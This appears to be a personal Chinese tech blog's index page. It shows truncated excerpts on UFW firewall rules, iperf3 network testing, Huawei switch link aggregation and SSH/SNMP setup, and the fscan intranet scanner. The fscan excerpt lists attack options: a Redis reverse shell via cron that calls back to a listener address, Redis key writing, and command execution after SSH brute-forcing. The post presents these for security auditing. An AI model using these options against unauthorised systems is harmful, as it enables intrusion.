Ubuntu 的防火墙(UFW)及禁止 ICMP 协议

UFW 是 Ubuntu 中配置防火墙规则的前端,可简化防火墙的配置过程。 安装:如果没有安装可以通过 APT 来安装:apt-get install ufw 安装后查看 UFW 是否正常运行:ufw status如果状态是 inactive ,则未被激活。 启用 / 禁用 UFW:ufw enable // 启用 ufw disable // 禁用 使用:查看当前防火墙规则:ufw status verbose允许入站(allow):ufw allow http // 添加 HTTP 端口 ufw allow 2023/tcp // 仅添加 TCP 端口 ufw allow 2023/udp // 仅添加 UDP 端口 ufw allow 2021:2030 // 添加 2021 到 2030 间的端口 拒绝访问(deny):// 拒绝与允许方式相似删除规则:ufw delete allow http规则太多也可以列出规则序号来删除:ufw status numbered // 列出规则序号 ufw delete 1 // 删除第一条规则禁止 ICMP 协议:vim /etc/

技术 · 2023-05-02

Linux 下网络带宽、抖动、丢包测试(iperf3)

对于公网带宽测试,我们通常使用 speedtest,而对于局域网环境或者公网点对点情况下的带宽、抖动、丢包测试一般使用 iperf3。注意 iperf3 与 iperf2 是不兼容的,两者不可混搭测试。对于 Red Hat 系:yum -y install iperf3对于 Debian 系:sudo apt install iperf3 iperf3 作为服务端时默认情况下会使用 5201 端口,如果测试环境存在防火墙或者安全组,记得放行此端口。 快速使用:iperf3 -s // 作为服务端运行,默认使用 5201 端口 iperf3 -s -p 2023 // 作为服务端运行,指定使用 2023 端口 iperf3 -c <S_IP> // 作为客户端运行并对目标服务端进行打流测试 iperf3 -c <S_IP> -p 2023 -i 1 -t 20 -R //-i 指定报告间隔 //-t 指定传输时间(默认 10s) //-R 以反向模式运行(服务器发送,客户端接收) //-P 并行客户端流的数量 iperf3 -c <S_IP> -p

技术 · 2023-04-30

一款内网综合扫描工具(fscan)

机房网络中经常有客户会因为软件更新不及时导致存在安全漏洞而被有关部门警告,提前做好安全感知防患于未然。fscan 是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。简单用法:fscan.exe -h 192.168.1.1/24 (默认使用全部模块) fscan.exe -h 192.168.1.1/16 (B 段扫描) 其他用法:fscan.exe -h 192.168.1.1/24 -np -no -nopoc (跳过存活检测 、不保存文件、跳过 web poc 扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹 shell) fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行) fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块 ssh 和端口) fscan.exe -h 192.

技术 · 2023-01-29

HUAWEI / 华为 交换机端口聚合操作

操作方法:# 创建 eth-trunk1 接口 [*CE1-GE1/0/1] int eth-trunk 1 # 把 g2-4 接口加入到 eth-trunk1 接口 [*CE1-Eth-Trunk1] trunkport g 1/0/2 to 1/0/4在 SwitchA 上创建 Eth-Trunk1 并配置为 LACP 模式,SwitchB 的配置与 SwitchA 类似。<HUAWEI> system-view [HUAWEI] sysname SwitchA [SwitchA] interface eth-trunk 1 // 创建 ID 为 1 的 Eth-Trunk 接口 [SwitchA-Eth-Trunk1] mode lacp // 配置链路聚合模式为 LACP 模式 [SwitchA-Eth-Trunk1] quit在 SwitchA 上配置系统优先级为 100,使其成为 LACP 主动端:[SwitchA] lacp priority 100 // 系统 LACP 优先级缺省为 32768,修改 SwitchA 的优先级大于 SwitchB 的

技术 · 2022-12-30

HUAWEI / H3C 交换机 SSH 登录及 SNMP 监控

HUAWEI配置 VTY 用户界面的支持协议类型、认证方式和用户级别:[JinJian] user-interface vty 0 4 [JinJian-ui-vty0-4] authentication-mode aaa // 配置 VTY 用户界面认证方式为 AAA 认证 [JinJian-ui-vty0-4] protocol inbound ssh // 配置 VTY 用户界面支持的协议为 SSH,默认情况下即 SSH [JinJian-ui-vty0-4] user privilege level 15 // 配置 VTY 用户界面的级别为 15 [JinJian-ui-vty0-4] quit开启 STelnet 服务器功能:[JinJian] stelnet server enable // 使能设备的 STelnet 服务器功能 配置 SSH 用户认证方式:[JinJian] ssh authentication-type default password // 配置 SSH 用户缺省采用密码认证 [JinJian] aaa [JinJia

技术 · 2022-11-11
2025 吕金鉴的主页. 版权所有
Theme Jasmine. 由 Cloudflare 提供 CDN 加速 ICP 20232321